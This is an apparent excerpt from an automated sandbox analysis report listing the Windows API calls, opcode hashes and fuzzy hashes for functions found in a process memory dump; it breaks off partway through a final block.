                                    • API String ID: 3270668897-0
                                    • Opcode ID: 6882690f09108301da322c924d95972048bff093752235bb1f516b1b17fecf5e
                                    • Instruction ID: e21ea13337b8509a8886dbc2996baa5dbb390130eee3705bd4618ba193e3823a
                                    • Opcode Fuzzy Hash: 6882690f09108301da322c924d95972048bff093752235bb1f516b1b17fecf5e
                                    • Instruction Fuzzy Hash: 35519E39200A119BEB2CEBACA86867F77F1EF94644B55445DE8439B2C1FB714E82C391
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                      • Part of subcall function 011E00B0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,?,?,011DDF68,00000001,?,00000000,011E3458,-00000105,011FBDD8,00000240,011E4B82,00000000,00000000,011EAE6E,00000000), ref: 011E00C1
                                      • Part of subcall function 011E00B0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,011DDF68,00000001,?,00000000,011E3458,-00000105,011FBDD8,00000240,011E4B82,00000000,00000000,011EAE6E,00000000,?), ref: 011E00C8
                                    • _pipe.MSVCRT ref: 011DAF9F
                                      • Part of subcall function 011DDBCE: _dup.MSVCRT ref: 011DDBD5
                                    • longjmp.MSVCRT(0120B8B8,00000001), ref: 011F12F1
                                      • Part of subcall function 011DDBFC: _dup2.MSVCRT ref: 011DDC10
                                      • Part of subcall function 011DDB92: _close.MSVCRT ref: 011DDBC1
                                    • _get_osfhandle.MSVCRT ref: 011DB047
                                    • DuplicateHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(00000000), ref: 011DB055
                                      • Part of subcall function 011DE040: memset.MSVCRT ref: 011DE090
                                      • Part of subcall function 011DE040: wcschr.MSVCRT ref: 011DE0F3
                                      • Part of subcall function 011DE040: wcschr.MSVCRT ref: 011DE10B
                                      • Part of subcall function 011DE040: _wcsicmp.MSVCRT ref: 011DE179
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.912036366.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000F.00000002.912070662.0000000001219000.00000040.00000001.sdmp
                                    • Associated: 0000000F.00000002.912084501.000000000121D000.00000040.00000001.sdmp
                                    Similarity
                                    • API ID: Heapwcschr$AllocDuplicateHandleProcess_close_dup_dup2_get_osfhandle_pipe_wcsicmplongjmpmemset
                                    • String ID:
                                    • API String ID: 1441200171-0
                                    • Opcode ID: 6cad21d06427e9c0ae52906e1e5b7ca901d78b711cd73aa69c338ffce1a03d55
                                    • Instruction ID: 4adc1ec5e026a01e762791da8a3d31ae191c7c722cd5859a0596a3743e8a29b3
                                    • Opcode Fuzzy Hash: 6cad21d06427e9c0ae52906e1e5b7ca901d78b711cd73aa69c338ffce1a03d55
                                    • Instruction Fuzzy Hash: CC51BF746047019FDB3CDF79E899A3A77E1EB95328B108A2EE46BC72D4DB30A441CB45
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.912036366.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000F.00000002.912070662.0000000001219000.00000040.00000001.sdmp
                                    • Associated: 0000000F.00000002.912084501.000000000121D000.00000040.00000001.sdmp
                                    Similarity
                                    • API ID: iswdigit
                                    • String ID:
                                    • API String ID: 3849470556-0
                                    • Opcode ID: 56c411d0bb0143154565cf3f04d095eab591efeb6e4135075c6b1875747ee49d
                                    • Instruction ID: d09a34828198d013f7ac1bce7e74096f6f9a04199d44658a5ec333314f793b97
                                    • Opcode Fuzzy Hash: 56c411d0bb0143154565cf3f04d095eab591efeb6e4135075c6b1875747ee49d
                                    • Instruction Fuzzy Hash: 4C51D470A046019FDB2DDFE9D59827EB7E1EB88304F15416AE90187381EBB59A82CB91
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • SetErrorMode.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,00000000,?,00000000,00000000,?,?,?,011E3C29,?,00000000,-00000001,00000000,?,00000000), ref: 011E2D87
                                    • SetErrorMode.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000001,?,011E3C29,?,00000000,-00000001,00000000,?,00000000), ref: 011E2D91
                                    • GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0(00000000,-00000001,?,00000000,?,011E3C29,?,00000000,-00000001,00000000,?,00000000), ref: 011E2DA4
                                    • SetErrorMode.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,?,011E3C29,?,00000000,-00000001,00000000,?,00000000), ref: 011E2DAE
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.912036366.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000F.00000002.912070662.0000000001219000.00000040.00000001.sdmp
                                    • Associated: 0000000F.00000002.912084501.000000000121D000.00000040.00000001.sdmp
                                    Similarity
                                    • API ID: ErrorMode$FullNamePath
                                    • String ID:
                                    • API String ID: 268959451-0
                                    • Opcode ID: f3d49440b11c6ae843187889818cca761bb1577a1bf445bedffb8b356851c5b0
                                    • Instruction ID: 4966c4f414c69bd40c7ef73025f77b80acc0af26ced68ebd90731c41d3a9fc39
                                    • Opcode Fuzzy Hash: f3d49440b11c6ae843187889818cca761bb1577a1bf445bedffb8b356851c5b0
                                    • Instruction Fuzzy Hash: B4414639500501ABCF2CDFE8D8698BEB7EEFF88704714851DEA06C7244E771AA41C790
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,00000000,00000000,00000000,?,011DE5F6,?,00000000,00000000,00000000), ref: 011DEF39
                                    • RtlFreeHeap.NTDLL(00000000,?,011DE5F6), ref: 011DEF40
                                    • _setjmp3.MSVCRT ref: 011DEFA5
                                    • VirtualFree.API-MS-WIN-CORE-MEMORY-L1-1-0(00000000,00000000,00008000,00000000,00000000,00000000,?,011DE5F6,?,00000000,00000000,00000000), ref: 011DF00D
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.912036366.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000F.00000002.912070662.0000000001219000.00000040.00000001.sdmp
                                    • Associated: 0000000F.00000002.912084501.000000000121D000.00000040.00000001.sdmp
                                    Similarity
                                    • API ID: FreeHeap$ProcessVirtual_setjmp3
                                    • String ID:
                                    • API String ID: 2613391085-0
                                    • Opcode ID: bec839cdf8302e77e33eeeb4fda6f59bf7eed430cf9b2d882cc8f4d348d48299
                                    • Instruction ID: 32d94aa905706fb3b5fd6c586a578578908704fa008467da15e92370d5f46cb2
                                    • Opcode Fuzzy Hash: bec839cdf8302e77e33eeeb4fda6f59bf7eed430cf9b2d882cc8f4d348d48299
                                    • Instruction Fuzzy Hash: 10319C716012119FEB3DEF6EB80C72A7AE5BB54B19F14416EE509CB285DB70D880CB92
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                      • Part of subcall function 011E00B0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,?,?,011DDF68,00000001,?,00000000,011E3458,-00000105,011FBDD8,00000240,011E4B82,00000000,00000000,011EAE6E,00000000), ref: 011E00C1
                                      • Part of subcall function 011E00B0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,011DDF68,00000001,?,00000000,011E3458,-00000105,011FBDD8,00000240,011E4B82,00000000,00000000,011EAE6E,00000000,?), ref: 011E00C8
                                    • longjmp.MSVCRT(0120B8B8,00000001,?,?,011E3A4E,?,?,?,?,?,?,?,?), ref: 011F57DE
                                    • MultiByteToWideChar.API-MS-WIN-CORE-STRING-L1-1-0(?,00000000,00000000,000000FF,00000000,00000000,?,?,011E3A4E), ref: 011F581D
                                    • SetErrorMode.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000001,?,00000000,00000000,000000FF,00000000,00000000,?,?,011E3A4E), ref: 011F5825
                                    • SetErrorMode.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,?,00000000,00000000,000000FF,00000000,00000000,?,?,011E3A4E), ref: 011F5867
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.912036366.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000F.00000002.912070662.0000000001219000.00000040.00000001.sdmp
                                    • Associated: 0000000F.00000002.912084501.000000000121D000.00000040.00000001.sdmp
                                    Similarity
                                    • API ID: ErrorHeapMode$AllocByteCharMultiProcessWidelongjmp
                                    • String ID:
                                    • API String ID: 162963024-0
                                    • Opcode ID: 95fb2bb0f05b6380a9cc0043c9a2ff0d90be67f7e1d96659ec0edd1a89a86589
                                    • Instruction ID: 3470260970c4f6054cff1013fd6ad86558c2cb568a0ebd0c722e94788eab0564
                                    • Opcode Fuzzy Hash: 95fb2bb0f05b6380a9cc0043c9a2ff0d90be67f7e1d96659ec0edd1a89a86589
                                    • Instruction Fuzzy Hash: 53212C35700A029BD738EBB99C5C9BE775BDFD4254B19022CEE0687284DF718E4187A1
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,00000000,?,?,?,?,?,?,?,?,?,?,011F1C4B), ref: 011F2A34
                                    • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,?,011F1C4B), ref: 011F2A3B
                                    • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00000000,?,?,?,?,?,?,?,?,?,?,011F1C4B), ref: 011F2A4D
                                    • RtlFreeHeap.NTDLL(00000000), ref: 011F2A54
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.912036366.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000F.00000002.912070662.0000000001219000.00000040.00000001.sdmp
                                    • Associated: 0000000F.00000002.912084501.000000000121D000.00000040.00000001.sdmp
                                    Similarity
                                    • API ID: Heap$Process$AllocFree
                                    • String ID:
                                    • API String ID: 756756679-0
                                    • Opcode ID: 6fa60d7e79a3e40e8fc35647d52b77907693c8a6404d2fe79977106f15287ac0
                                    • Instruction ID: f1e68768cc038b9fca5a46d3a0311cdfb8e442dac5001c7270271d2d0dc97ed5
                                    • Opcode Fuzzy Hash: 6fa60d7e79a3e40e8fc35647d52b77907693c8a6404d2fe79977106f15287ac0
                                    • Instruction Fuzzy Hash: D9311375A00604EFCB29DF69D49895ABBF5FF48310B04856EEE4A87714EB30E941CF50
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                      • Part of subcall function 011E00B0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,?,?,011DDF68,00000001,?,00000000,011E3458,-00000105,011FBDD8,00000240,011E4B82,00000000,00000000,011EAE6E,00000000), ref: 011E00C1
                                      • Part of subcall function 011E00B0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,011DDF68,00000001,?,00000000,011E3458,-00000105,011FBDD8,00000240,011E4B82,00000000,00000000,011EAE6E,00000000,?), ref: 011E00C8
                                    • GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(00000000,?,?,011E2F2C,-00000001,-00000001,-00000001,-00000001), ref: 011E4ED6
                                    • longjmp.MSVCRT(0120B8B8,00000001,?,00000104,00000000,?,?,011E2F2C,-00000001,-00000001,-00000001,-00000001), ref: 011EF016
                                    • _get_osfhandle.MSVCRT ref: 011EF01E
                                    • GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(00000000,?,?,011E2F2C,-00000001,-00000001,-00000001,-00000001), ref: 011EF02C
                                      • Part of subcall function 011E0178: _get_osfhandle.MSVCRT ref: 011E0183
                                      • Part of subcall function 011E0178: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(00000000,011ED6A1), ref: 011E018D
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.912036366.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000F.00000002.912070662.0000000001219000.00000040.00000001.sdmp
                                    • Associated: 0000000F.00000002.912084501.000000000121D000.00000040.00000001.sdmp
                                    Similarity
                                    • API ID: BufferConsoleHeapInfoScreen_get_osfhandle$AllocFileProcessTypelongjmp
                                    • String ID:
                                    • API String ID: 1629431960-0
                                    • Opcode ID: 09e3627f18f4539bf6f7a05dd47c1a1860e7fe36fec9737f7a8998d7cf064fbe
                                    • Instruction ID: 2e8e8ef8b68457230fb79b11b6cbd85ca4eb97679f866bedc89ea06818a08adb
                                    • Opcode Fuzzy Hash: 09e3627f18f4539bf6f7a05dd47c1a1860e7fe36fec9737f7a8998d7cf064fbe
                                    • Instruction Fuzzy Hash: 0321F571A00B069FE7389FB4E44CB7ABBE5EF24715F04082EE846C6140EB75D801CB41
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • wcstol.MSVCRT ref: 011DAEC7
                                    • wcstol.MSVCRT ref: 011DAED7
                                    • lstrcmpW.API-MS-WIN-CORE-STRING-OBSOLETE-L1-1-0(?,?), ref: 011DAF51
                                    • lstrcmpiW.API-MS-WIN-CORE-STRING-OBSOLETE-L1-1-0(?,?), ref: 011DAF5B
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.912036366.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000F.00000002.912070662.0000000001219000.00000040.00000001.sdmp
                                    • Associated: 0000000F.00000002.912084501.000000000121D000.00000040.00000001.sdmp
                                    Similarity
                                    • API ID: wcstol$lstrcmplstrcmpi
                                    • String ID:
                                    • API String ID: 4273384694-0
                                    • Opcode ID: 65c62201fb017387a4d3b455d680fab5252e61a9b53894a2ef43e8d82d4f4729
                                    • Instruction ID: c35f12d9e28c13a1475bf28ff1810d70f98651d886688a9cd6f5d20969a42f23
                                    • Opcode Fuzzy Hash: 65c62201fb017387a4d3b455d680fab5252e61a9b53894a2ef43e8d82d4f4729
                                    • Instruction Fuzzy Hash: A511A5B2900526AB8B6DDE7CFA5C8797B68FF0125470603D0E901D79C4D725ED60C6D2
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • memset.MSVCRT ref: 011F99B8
                                      • Part of subcall function 011E0C70: ??_V@YAXPAX@Z.MSVCRT ref: 011E0CBA
                                      • Part of subcall function 011E0C70: memset.MSVCRT ref: 011E0CDD
                                    • GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0(004D0043,-00000209,00000000,00000000,-00000209,?,011D2178,00310030), ref: 011F99FC
                                    • GetDriveTypeW.API-MS-WIN-CORE-FILE-L1-1-0(00000000,?,011D2178,00310030), ref: 011F9A2E
                                    • ??_V@YAXPAX@Z.MSVCRT ref: 011F9A3E
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.912036366.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000F.00000002.912070662.0000000001219000.00000040.00000001.sdmp
                                    • Associated: 0000000F.00000002.912084501.000000000121D000.00000040.00000001.sdmp
                                    Similarity
                                    • API ID: memset$DriveFullNamePathType
                                    • String ID:
                                    • API String ID: 3442494845-0
                                    • Opcode ID: 4a1655012cdb268907ade88d973b4a9eb78a32a82459891be4ad02e9f32c4f3f
                                    • Instruction ID: 71ba0e9fa0b896792e1cd5a68a757bbc540353d7ae598a7f4be2f3a570a5bef6
                                    • Opcode Fuzzy Hash: 4a1655012cdb268907ade88d973b4a9eb78a32a82459891be4ad02e9f32c4f3f
                                    • Instruction Fuzzy Hash: 26213571A0011E9BDF25DFE8EC89BBE77B8EB14308F0401A9A605E2141E775DA448B51
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,00000000,00000001,?,011FC100,0000001C,011F4C85), ref: 011F5695
                                    • RegQueryValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,00000000,00000000,?,00000000,?,011FC100,0000001C,011F4C85), ref: 011F56B0
                                    • RegQueryValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,00000000,00000000,?,00000000,?), ref: 011F56EF
                                    • SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000), ref: 011F570C
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.912036366.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000F.00000002.912070662.0000000001219000.00000040.00000001.sdmp
                                    • Associated: 0000000F.00000002.912084501.000000000121D000.00000040.00000001.sdmp
                                    Similarity
                                    • API ID: QueryValue$ErrorLastOpen
                                    • String ID:
                                    • API String ID: 4270309053-0
                                    • Opcode ID: 1443f0a14c73e48eea46206398f76b8e19f9dc0ab2dc8bf68a5fc5171db318e6
                                    • Instruction ID: a53c6d3f8941d9532d4033516e2c3ffa7e9753d75c1f43f1f85f549d2c8fe1c7
                                    • Opcode Fuzzy Hash: 1443f0a14c73e48eea46206398f76b8e19f9dc0ab2dc8bf68a5fc5171db318e6
                                    • Instruction Fuzzy Hash: E42150B1D0061AEFEF589FD998949EEBABEFF58654B404119EA11F3180DB748D408BA0
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.912036366.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000F.00000002.912070662.0000000001219000.00000040.00000001.sdmp
                                    • Associated: 0000000F.00000002.912084501.000000000121D000.00000040.00000001.sdmp
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 05b765704793d8109c05aa092e338c3b8b31b5ea0fb48cb35bb1eeb7805d24e7
                                    • Instruction ID: cfc303fd70615c32d237e95fe4f00c6868202794dbac1804ea7544138eead1f6
                                    • Opcode Fuzzy Hash: 05b765704793d8109c05aa092e338c3b8b31b5ea0fb48cb35bb1eeb7805d24e7
                                    • Instruction Fuzzy Hash: D8110831A00B0CABDF2D9B98A82CBBE7BA9DB49328F14411AF911D70D0DB70D940CF91
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • memset.MSVCRT ref: 011FB953
                                      • Part of subcall function 011E0C70: ??_V@YAXPAX@Z.MSVCRT ref: 011E0CBA
                                      • Part of subcall function 011E0C70: memset.MSVCRT ref: 011E0CDD
                                    • GetVolumePathNameW.API-MS-WIN-CORE-FILE-L1-1-0(00000000,00000000,00000001,-00000001,00000001,00000000,00000000), ref: 011FB98D
                                    • GetDriveTypeW.API-MS-WIN-CORE-FILE-L1-1-0(00000000), ref: 011FB9A5
                                    • ??_V@YAXPAX@Z.MSVCRT ref: 011FB9B9
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.912036366.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000F.00000002.912070662.0000000001219000.00000040.00000001.sdmp
                                    • Associated: 0000000F.00000002.912084501.000000000121D000.00000040.00000001.sdmp
                                    Similarity
                                    • API ID: memset$DriveNamePathTypeVolume
                                    • String ID:
                                    • API String ID: 1029679093-0
                                    • Opcode ID: fd7587cda096613f6aa5fd309938c613a9ed63bd64219a7e071c9a2ea557b6c4
                                    • Instruction ID: e7cc721ea439e4f1ce3fc2d05b13b0f85f9db091b48783af27da552c08689174
                                    • Opcode Fuzzy Hash: fd7587cda096613f6aa5fd309938c613a9ed63bd64219a7e071c9a2ea557b6c4
                                    • Instruction Fuzzy Hash: 72115471A04109ABDF24DAE9EC89BBFBBB8FB54348F48006DA614D3141EB34DA44C791
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • _get_osfhandle.MSVCRT ref: 011F9185
                                    • WriteFile.API-MS-WIN-CORE-FILE-L1-1-0(00000000,011F8CA9,?,?,00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 011F918D
                                    • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,?,?,?,?,00000000,00000000), ref: 011F91A4
                                    • DeleteFileW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,?,?,?,?,00000000,00000000), ref: 011F91D1
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.912036366.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000F.00000002.912070662.0000000001219000.00000040.00000001.sdmp
                                    • Associated: 0000000F.00000002.912084501.000000000121D000.00000040.00000001.sdmp
                                    Similarity
                                    • API ID: File$DeleteErrorLastWrite_get_osfhandle
                                    • String ID:
                                    • API String ID: 2448200120-0
                                    • Opcode ID: 255e9e86a95a52a0a4ffa4689dbf7546802cccb850d81249b8cf5a5657737c1e
                                    • Instruction ID: 499c3324025d5890067361c84f672c64880c49859f969036f7d5f2ee01bbea58
                                    • Opcode Fuzzy Hash: 255e9e86a95a52a0a4ffa4689dbf7546802cccb850d81249b8cf5a5657737c1e
                                    • Instruction Fuzzy Hash: ED11B2316042199BEF3DEB95F85CB7E7769EB9572DF00402DFA0482184DF709840C7A0
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?), ref: 011DAC8E
                                    • RtlFreeHeap.NTDLL(00000000), ref: 011DAC95
                                    • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?), ref: 011DACBE
                                    • RtlFreeHeap.NTDLL(00000000), ref: 011DACC5
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.912036366.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000F.00000002.912070662.0000000001219000.00000040.00000001.sdmp
                                    • Associated: 0000000F.00000002.912084501.000000000121D000.00000040.00000001.sdmp
                                    Similarity
                                    • API ID: Heap$FreeProcess
                                    • String ID:
                                    • API String ID: 3859560861-0
                                    • Opcode ID: c47e4b0d38746c8a39c3f51b2aaa6e153df6026e224dccdaaff99d6d3f846062
                                    • Instruction ID: 6348abebaca485cdcab2db9325b7d55d81ac5ea499bb28ba1979bbe6f0d0d36c
                                    • Opcode Fuzzy Hash: c47e4b0d38746c8a39c3f51b2aaa6e153df6026e224dccdaaff99d6d3f846062
                                    • Instruction Fuzzy Hash: 701190316042409BDB28EF69B4587767FA5BF55238F24444DE58A8B285CB20D882CB61
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00000000,00000000), ref: 011E5D9D
                                    • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000), ref: 011E5DA4
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.912036366.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000F.00000002.912070662.0000000001219000.00000040.00000001.sdmp
                                    • Associated: 0000000F.00000002.912084501.000000000121D000.00000040.00000001.sdmp
                                    Similarity
                                    • API ID: Heap$AllocProcess
                                    • String ID:
                                    • API String ID: 1617791916-0
                                    • Opcode ID: 4ba294cf1c91c51b44c16f661740f0fed713df5f588078cb65855562d12d64c6
                                    • Instruction ID: 0f5a41989acc2c0d18a20331048d3f20a51405a75de3d5e67516c39bbb082f85
                                    • Opcode Fuzzy Hash: 4ba294cf1c91c51b44c16f661740f0fed713df5f588078cb65855562d12d64c6
                                    • Instruction Fuzzy Hash: D7114C39A04D1157CA7CEA99641CBBF2BD7FF94A28B1A0148ED075B24CCF228C438791
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00000800,00000800,-00000004,-00000004,?,011DEBC3), ref: 011E0117
                                    • HeapReAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000), ref: 011E011E
                                    • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00000000), ref: 011E0133
                                    • HeapSize.API-MS-WIN-CORE-HEAP-L1-1-0(00000000), ref: 011E013A
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.912036366.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000F.00000002.912070662.0000000001219000.00000040.00000001.sdmp
                                    • Associated: 0000000F.00000002.912084501.000000000121D000.00000040.00000001.sdmp
                                    Similarity
                                    • API ID: Heap$Process$AllocSize
                                    • String ID:
                                    • API String ID: 2549470565-0
                                    • Opcode ID: b62ac5cf74e527bbaca5e0c54ed26ef5d1d018e2b61f228458600971850c4d61
                                    • Instruction ID: e2a7a4aa19491613736b4a0f1eaa3d6b69ab3a3bdc62ec0be1301525b8a0adc7
                                    • Opcode Fuzzy Hash: b62ac5cf74e527bbaca5e0c54ed26ef5d1d018e2b61f228458600971850c4d61
                                    • Instruction Fuzzy Hash: 9601F5723006019BDB25DB99FC8CF9A7BE9FB98765F250024F60ACA040DF71D884CB90
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F5,?,?,?,?,?,?,?,?,?,?,011EE18E), ref: 011F7E19
                                    • GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(00000000,?,?,?,?,?,?,?,?,?,?,011EE18E), ref: 011F7E26
                                    • FillConsoleOutputAttribute.API-MS-WIN-CORE-CONSOLE-L2-1-0(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?,011EE18E), ref: 011F7E4A
                                    • SetConsoleTextAttribute.API-MS-WIN-CORE-CONSOLE-L2-1-0(00000000,00000000,?,?,?,?,?,?,?,?,?,011EE18E), ref: 011F7E52
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.912036366.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000F.00000002.912070662.0000000001219000.00000040.00000001.sdmp
                                    • Associated: 0000000F.00000002.912084501.000000000121D000.00000040.00000001.sdmp
                                    Similarity
                                    • API ID: Console$Attribute$BufferFillHandleInfoOutputScreenText
                                    • String ID:
                                    • API String ID: 1033415088-0
                                    • Opcode ID: e76b61c33b418d439c95b661e9753e38eeb6ff7738a44a534bfc0fa5155928ce
                                    • Instruction ID: 2329a96a56c81efd7d0546561d12292f04eb504c50e147800c7a24bf01edc832
                                    • Opcode Fuzzy Hash: e76b61c33b418d439c95b661e9753e38eeb6ff7738a44a534bfc0fa5155928ce
                                    • Instruction Fuzzy Hash: C801F532A04128AF8F18DFB4AC489FFB7FCEF1D214B00012AF916D2180EB249E41C3A5
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.912036366.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000F.00000002.912070662.0000000001219000.00000040.00000001.sdmp
                                    • Associated: 0000000F.00000002.912084501.000000000121D000.00000040.00000001.sdmp
                                    Similarity
                                    • API ID: __p__commode__p__fmode__set_app_type__setusermatherr
                                    • String ID:
                                    • API String ID: 1063105408-0
                                    • Opcode ID: 3c5deb9ecaa0acb2f520498a0b6c59ca6dc1e01f3bdae5207fec74ced7b54b32
                                    • Instruction ID: 550b7e3ba0860eacf3b7868c957b2cfc2887db86a85fd678a6cf72e94b96051c
                                    • Opcode Fuzzy Hash: 3c5deb9ecaa0acb2f520498a0b6c59ca6dc1e01f3bdae5207fec74ced7b54b32
                                    • Instruction Fuzzy Hash: 61115A70904B04DAEB3C9FB4B04C23836E1FB18359FA4462EE066861D5DB3789C1CB51
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                      • Part of subcall function 011E22C0: wcschr.MSVCRT ref: 011E22CC
                                    • CreateFileW.API-MS-WIN-CORE-FILE-L1-1-0(00000000,40000000,00000000,0000000C,00000004,08000080,00000000), ref: 011D43D5
                                    • _open_osfhandle.MSVCRT ref: 011D43E9
                                    • CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(00000000), ref: 011D4401
                                    • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 011E838D
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.912036366.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000F.00000002.912070662.0000000001219000.00000040.00000001.sdmp
                                    • Associated: 0000000F.00000002.912084501.000000000121D000.00000040.00000001.sdmp
                                    Similarity
                                    • API ID: CloseCreateErrorFileHandleLast_open_osfhandlewcschr
                                    • String ID:
                                    • API String ID: 22757656-0
                                    • Opcode ID: 7dd4dec72c7617a690203a4fcb87fe2e89d1862389bafd8faacce0fe12aed399
                                    • Instruction ID: c46d2590374e1c5e5ed94f8303d3313607c23a97add8386e0a967e63a5608983
                                    • Opcode Fuzzy Hash: 7dd4dec72c7617a690203a4fcb87fe2e89d1862389bafd8faacce0fe12aed399
                                    • Instruction Fuzzy Hash: DB01F232804220ABD728ABACB80DB5EBBA8AB51B39F110319F974E31C0DFB008458791
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,00000004,?,011E3DBB), ref: 011E3B33
                                    • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,011E3DBB), ref: 011E3B3A
